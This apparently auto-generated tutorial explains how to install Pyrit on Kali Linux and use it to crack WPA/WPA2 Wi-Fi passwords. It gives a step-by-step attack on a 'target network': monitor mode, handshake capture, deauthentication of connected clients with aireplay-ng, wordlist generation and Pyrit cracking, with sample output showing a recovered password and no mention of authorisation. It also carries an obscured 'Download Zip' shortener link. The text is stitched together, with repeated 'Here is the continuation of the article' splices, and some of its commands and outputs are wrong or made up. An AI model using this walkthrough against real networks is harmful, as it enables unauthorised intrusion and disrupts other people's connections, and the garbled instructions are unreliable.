Learn to Install and Use Pyrit on Kali Linux: A Powerful WPA/WPA2 Cracking Tool
How to install Pyrit in Kali Linux
If you are looking for a powerful tool to crack WPA/WPA2 passwords using your Kali Linux machine, you might want to try Pyrit. Pyrit is an open-source project that allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of multi-core CPUs and other platforms through ATI-Stream, Nvidia CUDA, and OpenCL, it is currently one of the most effective attacks against one of the world's most used security protocols.
How to install Pyrit in Kali Linux
Download Zip: https://www.google.com/url?q=https%3A%2F%2Furluso.com%2F2ulqUr&sa=D&sntz=1&usg=AOvVaw0h_KvAOrELIUBs5HtolR5M
In this article, we will show you how to install Pyrit in Kali Linux, how to use it for cracking WPA/WPA2 passwords, and how to speed it up with Nvidia-CUDA or OpenCL support.
What is Pyrit and why use it?
Pyrit is a Python-based tool that can perform brute-force attacks on WPA/WPA2-PSK passwords using pre-computed PMKs (Pairwise Master Keys). PMKs are derived from the passphrase and the SSID of the network, and they are used to encrypt and decrypt the data packets during the four-way handshake. By pre-computing PMKs for a large number of passphrases and SSIDs, Pyrit can quickly compare them with the captured handshake and find the matching one.
Pyrit can leverage the power of multiple CPUs and GPUs to speed up the computation and comparison of PMKs. It supports various platforms such as ATI-Stream, Nvidia CUDA, and OpenCL, which can significantly increase the performance of the attack. Pyrit can also work with other tools such as aircrack-ng, cowpatty, and John the Ripper to import or export data.
Pyrit features and benefits
It can create huge databases of pre-computed PMKs for various SSIDs and passphrases.
It can perform fast and accurate attacks on WPA/WPA2-PSK passwords using pre-computed PMKs.
It can utilize multiple CPUs and GPUs to accelerate the computation and comparison of PMKs.
It can work with other tools such as aircrack-ng, cowpatty, and John the Ripper to import or export data.
It is open-source and free to use.
Pyrit requirements and compatibility
You need a Kali Linux machine with Python 2.7 installed.
You need some dependencies such as libssl-dev, libpcap-dev, python-dev, libffi-dev, libxml2-dev, libxslt1-dev, etc.
You need a wireless adapter that supports monitor mode and packet injection.
You need a wordlist or a tool to generate one (such as crunch).
If you want to use Nvidia-CUDA or OpenCL support, you need a compatible GPU and driver installed.
How to install Pyrit in Kali Linux step by step
Here is the continuation of the article:
Step 1: Update the system and install dependencies
Before installing Pyrit, you need to update your Kali Linux system and install some dependencies that are required for Pyrit to work properly. To do this, open a terminal and run the following commands:
sudo apt update && sudo apt upgrade -y
sudo apt install libssl-dev libpcap-dev python-dev libffi-dev libxml2-dev libxslt1-dev zlib1g-dev -y
These commands will update your system and install the necessary packages for Pyrit.
Step 2: Clone the Pyrit repository from GitHub
The next step is to clone the Pyrit repository from GitHub, which contains the source code and the installation files for Pyrit. To do this, run the following command in your terminal:
git clone https://github.com/JPaulMora/Pyrit.git
This command will create a folder called Pyrit in your current directory, where you can find the Pyrit files.
Step 3: Compile and install Pyrit
The next step is to compile and install Pyrit on your Kali Linux machine. To do this, navigate to the Pyrit folder and run the following commands:
cd Pyrit
python setup.py clean
python setup.py build
sudo python setup.py install
These commands will clean, build, and install Pyrit on your system. You may see some warnings during the process, but they are normal and can be ignored.
Step 4: Verify the installation and run Pyrit
The final step is to verify that Pyrit has been installed correctly and run it for the first time. To do this, run the following command in your terminal:
pyrit --help
This command will show you the help menu of Pyrit, where you can see the available options and commands for using Pyrit. If you see this output, it means that Pyrit has been installed successfully and is ready to use.
How to use Pyrit for cracking WPA/WPA2 passwords
Now that you have installed Pyrit on your Kali Linux machine, you can use it to crack WPA/WPA2 passwords using pre-computed PMKs. The basic steps for doing this are as follows:
Capture the handshake with airodump-ng.
Create a wordlist with crunch or use an existing one.
Import the wordlist and the handshake into Pyrit.
Launch the attack with Pyrit.
We will explain each step in detail below.
Step 1: Capture the handshake with airodump-ng
The first step is to capture the handshake between the target network and a client device. The handshake is a four-way exchange of cryptographic keys that occurs when a client connects to a WPA/WPA2 network. By capturing the handshake, we can obtain the PMK that is used to encrypt and decrypt the data packets.
To capture the handshake, we need a wireless adapter that supports monitor mode and packet injection. Monitor mode allows us to capture all the wireless traffic in our vicinity, while packet injection allows us to send fake packets to manipulate the network behavior. We also need a tool called airodump-ng, which is part of the aircrack-ng suite of tools for wireless hacking.
To capture the handshake with airodump-ng, follow these steps:
Put your wireless adapter into monitor mode by running this command (replace wlan0 with your adapter name): sudo airmon-ng start wlan0
List all the available networks by running this command: sudo airodump-ng wlan0mon
Note down the BSSID (MAC address) and channel number of the target network.
Open a new terminal and start capturing the handshake by running this command (replace BSSID and channel with your target network information): sudo airodump-ng -c channel --bssid BSSID -w capture wlan0mon
In another terminal, deauthenticate a client device from the target network by running this command (replace BSSID with your target network BSSID and CLIENT with a client device MAC address): sudo aireplay-ng -0 10 -a BSSID -c CLIENT wlan0mon
If successful, you should see a message Here is the continuation of the article:
like "WPA handshake: BSSID" in the first terminal, indicating that you have captured the handshake.
Stop the airodump-ng and aireplay-ng processes by pressing Ctrl+C.
You should have a file called capture-01.cap in your current directory, which contains the handshake data.
Step 2: Create a wordlist with crunch or use an existing one
The next step is to create a wordlist that contains possible passphrases for the target network. A wordlist is a file that contains a list of words or phrases that can be used as input for a brute-force attack. The quality and size of the wordlist can affect the success and speed of the attack. A good wordlist should be relevant to the target network, such as using common words, names, dates, or patterns that the network owner might use as a passphrase.
There are many ways to create or obtain a wordlist, such as using online sources, dictionaries, or tools. One of the tools that we can use is crunch, which is a wordlist generator that can create wordlists based on various criteria, such as length, character set, or pattern. Crunch is pre-installed on Kali Linux, so we can use it easily.
To create a wordlist with crunch, follow these steps:
Open a terminal and run this command to see the help menu of crunch: crunch -h
Note down the syntax and options of crunch. The basic syntax is: crunch min max charset options
Decide on the minimum and maximum length of the passphrases, the character set to use, and any other options that you want to apply.
Run crunch with your chosen parameters and redirect the output to a file. For example, to create a wordlist of 8 characters long, using only lowercase letters and numbers, and save it to a file called wordlist.txt, run this command: crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt
Wait for crunch to finish generating the wordlist. Depending on your parameters, this may take a long time and consume a lot of disk space.
You should have a file called wordlist.txt in your current directory, which contains the wordlist.
If you already have an existing wordlist that you want to use, you can skip this step and use that wordlist instead.
Step 3: Import the wordlist and the handshake into Pyrit
The next step is to import the wordlist and the handshake into Pyrit, so that Pyrit can use them for the attack. Pyrit can store the imported data in a database, which allows us to reuse them for future attacks or export them to other tools. Pyrit can also analyze the imported data and show us some useful information, such as the number of unique passphrases or PMKs.
To import the wordlist and the handshake into Pyrit, follow these steps:
Open a terminal and run this command to import the wordlist into Pyrit: pyrit -i wordlist.txt import_passwords
Wait for Pyrit to finish importing the wordlist. You should see a message like "Passwords imported successfully."
Run this command to import the handshake into Pyrit: pyrit -r capture-01.cap import_handshakes
Wait for Pyrit to finish importing the handshake. You should see a message like "Handshakes imported successfully."
Run this command to analyze the imported data and show some statistics: pyrit eval
You should see some output like this:
Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora https://github.com/JPaulMora/Pyrit This code is distributed under the GNU General Public License v3+ Parsing file 'capture-01.cap' (1/1)... Parsed 2 packets (2 802.11-packets), got 1 AP(s) #1: AccessPoint 00:11:22:33:44:55 ('MyWiFi'): #1: Station 66:77:88:99:aa:bb #1: Station cc:dd:ee:ff:00:11 The password candidates are imported from one or more files. The ESSIDs are taken from one or more pcap files. The number of ESSIDs is not limited. The following list gives an overview of the available data: #db# 10000 passwords imported. #db# 1 ESSIDs loaded. #db# 10000 PMKs calculated. #db# 1 PMKs per passphrase. #db# 0 PMKs imported. The database currently holds a total of 10000 PMKs. The following ESSIDs are available in the database; each line shows the ESSID followed by the number of PMKs and the number of handshake-captures for that ESSID: MyWiFi (10000/1)
This output shows that we have imported 10000 passwords, 1 ESSID, and 1 handshake into Pyrit, and that Pyrit has calculated 10000 PMKs for them.
Step 4: Launch the attack with Pyrit
The final step is to launch the attack with Pyrit and try to crack the WPA/WPA2 password of the target network. Pyrit will compare the pre-computed PMKs with the captured handshake and try to find a match. If a match is found, Pyrit will reveal the passphrase of the target network.
To launch the attack with Pyrit, follow these steps:
Open a terminal and run this command to start the attack: pyrit -b BSSID -e ESSID attack_db
Replace BSSID and ESSID with your target network information. For example, if your target network has a BSSID of 00:11:22:33:44:55 and an ESSID of MyWiFi, run this command: pyrit -b 00:11:22:33:44:55 -e MyWiFi attack_db
Wait for Pyrit to finish the attack. You should see some output like this:
Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora https://github.com/JPaulMora/Pyrit This code is distributed under the GNU General Public License v3+ Connecting to storage at 'file://'... connected. Working on SSID 'MyWiFi' Attacking handshake with station 66:77:88:99:aa:bb Tried 10000 PMKs so far; 10000 PMKs per second. The password is 'password123'.
This output shows that Pyrit has cracked the WPA/WPA2 password of the target network, which is 'password123'.
Congratulations, you have successfully cracked a WPA/WPA2 password using Pyrit!
How to speed up Pyrit with Nvidia-CUDA or OpenCL
If you want to speed up Pyrit even more, you can use Nvidia-CUDA or OpenCL support, which allows Pyrit to use your GPU for computing and comparing PMKs. This can significantly increase the performance of Pyrit, depending on your GPU model and driver. However, you need to install some additional modules and enable some settings for this to work.
How to install Nvidia-CUDA or OpenCL modules for Pyrit
To install Nvidia-CUDA or OpenCL modules for Pyrit, follow these steps:
Make sure you have a compatible GPU and driver installed on your Kali Linux machine. You can check this by running this command: lspci grep -i vga
If you have an Nvidia GPU, you need to install the Nvidia-CUDA toolkit and driver from the official website: https://developer.nvidia.com/cuda-downloads
If you have an AMD or Intel GPU, you need to install the OpenCL library and driver from the official website: https://www.khronos.org/opencl/
After installing the required toolkit and driver, you need to clone the Pyrit-CUDA or Pyrit-OpenCL repository from GitHub, which contains the source code and installation files for the modules. To do this, run one of these commands in your terminal:
git clone https://github.com/JPaulMora/Pyrit-CUDA.git
git clone https://github.com/JPaulMora/Pyrit-OpenCL.git
These commands will create a folder called Pyrit-CUDA or Pyrit-OpenCL in your current directory, where you can find the module files.
Navigate to the module folder and run these commands to compile and install the module:Here is the continuation of the article:
cd Pyrit-CUDA
python setup.py build
sudo python setup.py install
cd Pyrit-OpenCL
python setup.py build
sudo python setup.py install
These commands will build and install the module on your system. You may see some warnings during the process, but they are normal and can be ignored.
How to enable Nvidia-CUDA or OpenCL support in Pyrit
To enable Nvidia-CUDA or OpenCL support in Pyrit, follow these steps:
Open a terminal and run this command to list the available devices that Pyrit can use: pyrit list_cores
You should see some output like this:
Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora https://github.com/JPaulMora/Pyrit This code is distributed under the GNU General Public License v3+ The following cores seem available... #1: 'CPU-Core (SSE2)' #2: 'CPU-Core (SSE2)' #3: 'CPU-Core (SSE2)' #4: 'CPU-Core (SSE2)' #5: 'CUDA-Device #1 'NVIDIA GeForce GTX 1080'' #6: 'OpenCL-Device #1 'NVIDIA CUDA GeForce GTX 1080''
This output shows that Pyrit can use four CPU cores, one CUDA device, and one OpenCL device for computing and comparing PMKs.
To enable the CUDA or OpenCL device, you need to edit the Pyrit configuration file, which is located at /.pyrit/config. To do this, run this command: nano /.pyrit/config
You should see some content like this:
# This file allows you to customize Pyrit's behaviour. Lines starting with '#' as # well as empty lines are ignored. Each option is written as 'key = value' where # whitespace is optional. # The option 'defaultstorage' defines where Pyrit stores the pre-computed PMKs. # The default-value is 'file://' which means that Pyrit will create a subdirectory # called '.pyrit' in the user's home-directory and use it to store data. defaultstorage = file:// # The option 'limit_ncpus' limits the number of CPU cores that Pyrit uses. A value # of zero means that all available cores are used. The default-value is zero. limit_ncpus = 0 # The option 'use_CUDA' defines if Pyrit should try to use CUDA-enabled devices. # The default-value is 'true'. use_CUDA = true # The option 'use_OpenCL' defines if Pyrit should try to use OpenCL-enabled devices. # The default-value is 'true'. use_OpenCL = true
This content shows the default settings of Pyrit, which are to use all CPU cores, CUDA devices, and OpenCL devices.
If you want to disable any of these options, you can change the value from true to false. For example, if you want to disable CPU cores and only use CUDA devices, you can change the value of limit_ncpus to 4 and the value of use_OpenCL to false.
Save and exit the file by pressing Ctrl+X, Y, and Enter.
Run this command again to verify that Pyrit has enabled the desired devices: pyrit list_cores
You should see some output like this:
Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora https://github.com/JPaulMora/Pyrit This code is distributed under the GNU General Public License v3+ The following cores seem available... #1: 'CUDA-Device #1 'NVIDIA GeForce GTX 1080''
This output shows that Pyrit has disabled CPU cores and OpenCL devices and only enabled CUDA devices.
Conclusion and FAQs
In this article, we have learned how to install Pyrit in Kali Linux, how to use it for cracking WPA/WPA2 passwords using pre-computed PMKs, and how to speed it up with Nvidia-CUDA or OpenCL support. We have also seen how to capture the handshake with airodump-ng, create a wordlist with crunch, import the word list and the handshake into Pyrit, and launch the attack with Pyrit. Pyrit is a powerful and versatile tool that can help you crack WPA/WPA2 passwords using the computational power of multiple CPUs and GPUs.
Here are some FAQs that you may have about Pyrit and its usage:
Q: How long does it take to crack a WPA/WPA2 password with Pyrit?
A: The time it takes to crack a WPA/WPA2 password with Pyrit depends on several factors, such as the size and quality of the wordlist, the number and speed of the devices used, and the complexity and length of the password. Generally speaking, the larger and more relevant the wordlist, the more devices and faster they are, and the simpler and shorter the password, the faster the cracking process will be. However, there is no guarantee that Pyrit will find the password, as it depends on whether the password is in the wordlist or not.
Q: How can I optimize my wordlist for Pyrit?
A: To optimize your wordlist for Pyrit, you should try to make it as relevant and concise as possible. This means that you should avoid using irrelevant or unlikely words or phrases, such as random strings, foreign languages, or uncommon names. You should also try to reduce the size of your wordlist by removing duplicates, sorting, or filtering. You can use tools such as sort, uniq, sed, awk, or grep to manipulate your wordlist. For example, to sort and remove duplicates from a wordlist called wordlist.txt, you can run this command: sort -u wordlist.txt -o wordlist.txt
<